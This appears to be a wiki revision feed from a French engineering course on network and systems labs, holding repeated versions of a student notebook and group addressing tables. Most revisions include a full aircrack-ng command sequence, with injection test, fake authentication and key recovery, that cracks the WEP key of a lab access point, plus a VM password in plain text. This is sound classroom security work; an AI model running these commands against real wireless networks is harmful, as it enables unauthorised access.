 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:59 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
On effectue de fausses authentifications  &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon&lt;br /&gt;
&lt;br /&gt;
La clef WEP est alors décriptable :&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenu est le suivant :&lt;br /&gt;
 KEY FOUND! [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44 ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;/div&gt;</summary>
		<author><name>Sbensale</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56167</id>
		<title>TP sysres IMA5 2021/2022 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56167"/>
				<updated>2021-10-25T14:09:39Z</updated>
		
		<summary type="html">&lt;p&gt;Sbensale : /* Création de la machine virtuelle */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Cablage Réseau=&lt;br /&gt;
&lt;br /&gt;
=Machine Virtuelle=&lt;br /&gt;
&lt;br /&gt;
==Création de la machine virtuelle==&lt;br /&gt;
&lt;br /&gt;
Commande pour la création de la machine virtuelle:&lt;br /&gt;
 root@capbreton:~$ xen-create-image --hostname=Karmeliet --ip=193.48.57.179 --gateway=193.48.57.187 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=buster&lt;br /&gt;
&lt;br /&gt;
= Tests d'intrusions =&lt;br /&gt;
&lt;br /&gt;
===5.2 Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
Cette commande sert à récupérer le nom de l'interface réseau:&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Notre interface réseau s'appelle &amp;quot;wlan0mon&amp;quot; (renommé automatiquement parce que celui de base était trop long)&lt;br /&gt;
 &lt;br /&gt;
On démarre l'interface sur le channel 3 :&lt;br /&gt;
 airmon-ng start wlan0mon 3&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID du point d'accès sur lequel on veut récupérer la clé WEP&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On réalise un test d'injection sur cracotte10&lt;br /&gt;
 aireplay-ng -9 -e cracotte10 -a 04:DA:D2:9C:50:59 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère les VI générés par le point d'accès pour les stocker dans output :&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:59 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
On effectue de fausses authentifications  &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon&lt;br /&gt;
&lt;br /&gt;
La clef WEP est alors décriptable :&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenu est le suivant :&lt;br /&gt;
 KEY FOUND! [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44 ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;/div&gt;</summary>
		<author><name>Sbensale</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56166</id>
		<title>TP sysres IMA5 2021/2022 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56166"/>
				<updated>2021-10-25T14:09:30Z</updated>
		
		<summary type="html">&lt;p&gt;Sbensale : /* Création de la machine virtuelle */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Cablage Réseau=&lt;br /&gt;
&lt;br /&gt;
=Machine Virtuelle=&lt;br /&gt;
&lt;br /&gt;
==Création de la machine virtuelle==&lt;br /&gt;
&lt;br /&gt;
Commande pour la création de la machine virtuelle:&lt;br /&gt;
 pifou@capbreton:~$ xen-create-image --hostname=Karmeliet --ip=193.48.57.179 --gateway=193.48.57.187 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=buster&lt;br /&gt;
&lt;br /&gt;
= Tests d'intrusions =&lt;br /&gt;
&lt;br /&gt;
===5.2 Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
Cette commande sert à récupérer le nom de l'interface réseau:&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Notre interface réseau s'appelle &amp;quot;wlan0mon&amp;quot; (renommé automatiquement parce que celui de base était trop long)&lt;br /&gt;
 &lt;br /&gt;
On démarre l'interface sur le channel 3 :&lt;br /&gt;
 airmon-ng start wlan0mon 3&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID du point d'accès sur lequel on veut récupérer la clé WEP&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On réalise un test d'injection sur cracotte10&lt;br /&gt;
 aireplay-ng -9 -e cracotte10 -a 04:DA:D2:9C:50:59 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère les VI générés par le point d'accès pour les stocker dans output :&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:59 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
On effectue de fausses authentifications  &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon&lt;br /&gt;
&lt;br /&gt;
La clef WEP est alors décriptable :&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenu est le suivant :&lt;br /&gt;
 KEY FOUND! [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44 ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;/div&gt;</summary>
		<author><name>Sbensale</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56165</id>
		<title>TP sysres IMA5 2021/2022 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56165"/>
				<updated>2021-10-25T14:09:05Z</updated>
		
		<summary type="html">&lt;p&gt;Sbensale : /* Création de la machine virtuelle */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Cablage Réseau=&lt;br /&gt;
&lt;br /&gt;
=Machine Virtuelle=&lt;br /&gt;
&lt;br /&gt;
==Création de la machine virtuelle==&lt;br /&gt;
&lt;br /&gt;
Commande pour la création de la machine virtuelle :&lt;br /&gt;
pifou@capbreton:~$ xen-create-image --hostname=Karmeliet --ip=193.48.57.179 --gateway=193.48.57.187 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=buster&lt;br /&gt;
&lt;br /&gt;
= Tests d'intrusions =&lt;br /&gt;
&lt;br /&gt;
===5.2 Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
Cette commande sert à récupérer le nom de l'interface réseau:&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Notre interface réseau s'appelle &amp;quot;wlan0mon&amp;quot; (renommé automatiquement parce que celui de base était trop long)&lt;br /&gt;
 &lt;br /&gt;
On démarre l'interface sur le channel 3 :&lt;br /&gt;
 airmon-ng start wlan0mon 3&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID du point d'accès sur lequel on veut récupérer la clé WEP&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On réalise un test d'injection sur cracotte10&lt;br /&gt;
 aireplay-ng -9 -e cracotte10 -a 04:DA:D2:9C:50:59 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère les VI générés par le point d'accès pour les stocker dans output :&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:59 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
On effectue de fausses authentifications  &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon&lt;br /&gt;
&lt;br /&gt;
La clef WEP est alors décriptable :&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenu est le suivant :&lt;br /&gt;
 KEY FOUND! [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44 ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;/div&gt;</summary>
		<author><name>Sbensale</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56161</id>
		<title>TP sysres IMA5 2021/2022 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56161"/>
				<updated>2021-10-25T14:08:06Z</updated>
		
		<summary type="html">&lt;p&gt;Sbensale : /* VM */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Cablage Réseau=&lt;br /&gt;
&lt;br /&gt;
=Machine Virtuelle=&lt;br /&gt;
&lt;br /&gt;
==Création de la machine virtuelle==&lt;br /&gt;
&lt;br /&gt;
xen-create-image --hostname=Karmeliet --ip=193.48.57.179 --gateway=193.48.57.187 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=buster&lt;br /&gt;
&lt;br /&gt;
= Tests d'intrusions =&lt;br /&gt;
&lt;br /&gt;
===5.2 Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
Cette commande sert à récupérer le nom de l'interface réseau:&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Notre interface réseau s'appelle &amp;quot;wlan0mon&amp;quot; (renommé automatiquement parce que celui de base était trop long)&lt;br /&gt;
 &lt;br /&gt;
On démarre l'interface sur le channel 3 :&lt;br /&gt;
 airmon-ng start wlan0mon 3&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID du point d'accès sur lequel on veut récupérer la clé WEP&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On réalise un test d'injection sur cracotte10&lt;br /&gt;
 aireplay-ng -9 -e cracotte10 -a 04:DA:D2:9C:50:59 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère les VI générés par le point d'accès pour les stocker dans output :&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:59 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
On effectue de fausses authentifications  &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon&lt;br /&gt;
&lt;br /&gt;
La clef WEP est alors décriptable :&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenu est le suivant :&lt;br /&gt;
 KEY FOUND! [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44 ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;/div&gt;</summary>
		<author><name>Sbensale</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2021/2022&amp;diff=56137</id>
		<title>TP sysres IMA5sc 2021/2022</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2021/2022&amp;diff=56137"/>
				<updated>2021-10-25T13:48:42Z</updated>
		
		<summary type="html">&lt;p&gt;Sbensale : /* Plan d'adressage */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Répartition des binômes ==&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Cahier !! Elèves &lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G1 | Cahier n°1]]&lt;br /&gt;
| Andrei Florea / Julien Delabre&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G2 | Cahier n°2]]&lt;br /&gt;
| Robin Lasseyrie / Aviran Tetia &lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G3 | Cahier n°3]]&lt;br /&gt;
| Axel Guillaume&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G4 | Cahier n°4]]&lt;br /&gt;
| Selim Raphael&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G5 | Cahier n°5]]&lt;br /&gt;
| Helene Camille&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G6 | Cahier n°6]]&lt;br /&gt;
| Boris JACQUOT / Louis WADBLED&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G7 | Cahier n°7]]&lt;br /&gt;
| Johnny Gouvaert / Arthur Vercaemst&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G8 | Cahier n°8]]&lt;br /&gt;
| Mel Theo&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G9 | Cahier n°9]]&lt;br /&gt;
| Khalil Alvare&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G10 | Cahier n°10]]&lt;br /&gt;
| Souleyman Enoch&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G11 | Cahier n°11]]&lt;br /&gt;
| Clément&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G12 | Cahier n°12]]&lt;br /&gt;
| &lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G13 | Cahier n°13]]&lt;br /&gt;
| &lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Plan d'adressage=&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4 6509E (E304) !! IPv4 C9200 (E306) !! IPv4 ISR4331 (SR52) !! SSID !! VM &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 10 || 10.00.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.00.0.250 || 10.00.0.251 || 10.00.0.252 || 10.00.0.253 || Jonquille || Kronenbourg&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 01 || 10.01.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.01.0.250 || 10.01.0.251 || 10.01.0.252 || 10.01.0.253 || Marguerite || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 02 || 10.02.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.02.0.250 || 10.02.0.251 || 10.02.0.252 || 10.02.0.253 || Pensee || Kasteel&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 03 || 10.03.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.04.0.250 || 10.03.0.251 || 10.03.0.252 || 10.03.0.253 || Lavende || Karmeliet&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 04 || 10.04.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.03.0.250 || 10.04.0.251 || 10.04.0.252 || 10.04.0.253 || Tulipe || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 05 || 10.05.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.05.0.250 || 10.05.0.251 || 10.05.0.252 || 10.05.0.253 || Rose || Bellerose&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 06 || 10.06.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.06.0.250 || 10.06.0.251 || 10.06.0.252 || 10.06.0.253 || Orchidee || Anosteke&lt;br /&gt;
|- &lt;br /&gt;
| Mel / Theo || 07 || 10.07.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.07.0.250 || 10.07.0.251 || 10.07.0.252 || 10.07.0.253 || Tournesol || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 08 || 10.08.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.08.0.250 || 10.08.0.251 || 10.08.0.252 || 10.08.0.253 || Lys || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 09 || 10.09.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.09.0.250 || 10.09.0.251 || 10.09.0.252 || 10.09.0.253 || Pissenlit || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 110 || 10.10.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.10.0.250 || 10.10.0.251 || 10.10.0.252 || 10.10.0.253 || Coquelicot || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Table du VLAN 42&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! @IPv4 MV !! @IPv6 MV (auto) &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 193.48.57.176 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 193.48.57.177 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 193.48.57.178 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 193.48.57.179 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 193.48.57.180 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 193.48.57.181 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 193.48.57.182 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Mel / Theo || 193.48.57.183 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 193.48.57.184 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 193.48.57.185 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 193.48.57.186 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Note : &lt;br /&gt;
&lt;br /&gt;
'''à compléter '''&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Entité !! Élève !! Domaine !! 193.48.57.176/28 !! 10.60.0.0/16 !! 2001:660:4401:60B0::/60 !! 2001:7A8:116E:60B0::/60 !! VLAN !! VLAN WIFI !! N° VRRP !! SSID n°1 !! SSID n°2&lt;br /&gt;
|-&lt;br /&gt;
| ROUTEUR E304&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.187&lt;br /&gt;
| &lt;br /&gt;
| :: :F0&lt;br /&gt;
| :: :F0&lt;br /&gt;
| 10.NN.00.250&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR E306&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
| &lt;br /&gt;
| :: :F1&lt;br /&gt;
| :: :F1&lt;br /&gt;
| 10.NN.00.251&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR SR52&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.189&lt;br /&gt;
| &lt;br /&gt;
| :: :F2&lt;br /&gt;
| :: :F2&lt;br /&gt;
| 10.NN.00.252&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR FLOTTANTE&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.190&lt;br /&gt;
| &lt;br /&gt;
| :: :F3&lt;br /&gt;
| :: :F3&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO 531 INTERCO-SA&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.40/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E304&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.41/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E306&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.42/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO SR53&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.43/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv4 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv4 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv6 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv6 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Architecture réseau=&lt;/div&gt;</summary>
		<author><name>Sbensale</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2021/2022&amp;diff=56136</id>
		<title>TP sysres IMA5sc 2021/2022</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2021/2022&amp;diff=56136"/>
				<updated>2021-10-25T13:48:30Z</updated>
		
		<summary type="html">&lt;p&gt;Sbensale : /* Plan d'adressage */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Répartition des binômes ==&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Cahier !! Elèves &lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G1 | Cahier n°1]]&lt;br /&gt;
| Andrei Florea / Julien Delabre&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G2 | Cahier n°2]]&lt;br /&gt;
| Robin Lasseyrie / Aviran Tetia &lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G3 | Cahier n°3]]&lt;br /&gt;
| Axel Guillaume&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G4 | Cahier n°4]]&lt;br /&gt;
| Selim Raphael&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G5 | Cahier n°5]]&lt;br /&gt;
| Helene Camille&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G6 | Cahier n°6]]&lt;br /&gt;
| Boris JACQUOT / Louis WADBLED&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G7 | Cahier n°7]]&lt;br /&gt;
| Johnny Gouvaert / Arthur Vercaemst&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G8 | Cahier n°8]]&lt;br /&gt;
| Mel Theo&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G9 | Cahier n°9]]&lt;br /&gt;
| Khalil Alvare&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G10 | Cahier n°10]]&lt;br /&gt;
| Souleyman Enoch&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G11 | Cahier n°11]]&lt;br /&gt;
| Clément&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G12 | Cahier n°12]]&lt;br /&gt;
| &lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G13 | Cahier n°13]]&lt;br /&gt;
| &lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Plan d'adressage=&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4 6509E (E304) !! IPv4 C9200 (E306) !! IPv4 ISR4331 (SR52) !! SSID !! VM &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 10 || 10.00.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.00.0.250 || 10.00.0.251 || 10.00.0.252 || 10.00.0.253 || Jonquille || Kronenbourg&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 01 || 10.01.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.01.0.250 || 10.01.0.251 || 10.01.0.252 || 10.01.0.253 || Marguerite || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 02 || 10.02.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.02.0.250 || 10.02.0.251 || 10.02.0.252 || 10.02.0.253 || Pensee || Kasteel&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 03 || 10.03.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.04.0.250 || 10.03.0.251 || 10.03.0.252 || 10.03.0.253 || Lavende || Karmeliet;&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 04 || 10.04.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.03.0.250 || 10.04.0.251 || 10.04.0.252 || 10.04.0.253 || Tulipe || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 05 || 10.05.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.05.0.250 || 10.05.0.251 || 10.05.0.252 || 10.05.0.253 || Rose || Bellerose&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 06 || 10.06.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.06.0.250 || 10.06.0.251 || 10.06.0.252 || 10.06.0.253 || Orchidee || Anosteke&lt;br /&gt;
|- &lt;br /&gt;
| Mel / Theo || 07 || 10.07.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.07.0.250 || 10.07.0.251 || 10.07.0.252 || 10.07.0.253 || Tournesol || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 08 || 10.08.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.08.0.250 || 10.08.0.251 || 10.08.0.252 || 10.08.0.253 || Lys || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 09 || 10.09.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.09.0.250 || 10.09.0.251 || 10.09.0.252 || 10.09.0.253 || Pissenlit || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 110 || 10.10.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.10.0.250 || 10.10.0.251 || 10.10.0.252 || 10.10.0.253 || Coquelicot || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Table du VLAN 42&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! @IPv4 MV !! @IPv6 MV (auto) &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 193.48.57.176 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 193.48.57.177 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 193.48.57.178 || &amp;amp;nbsp;&lt;br /&gt;
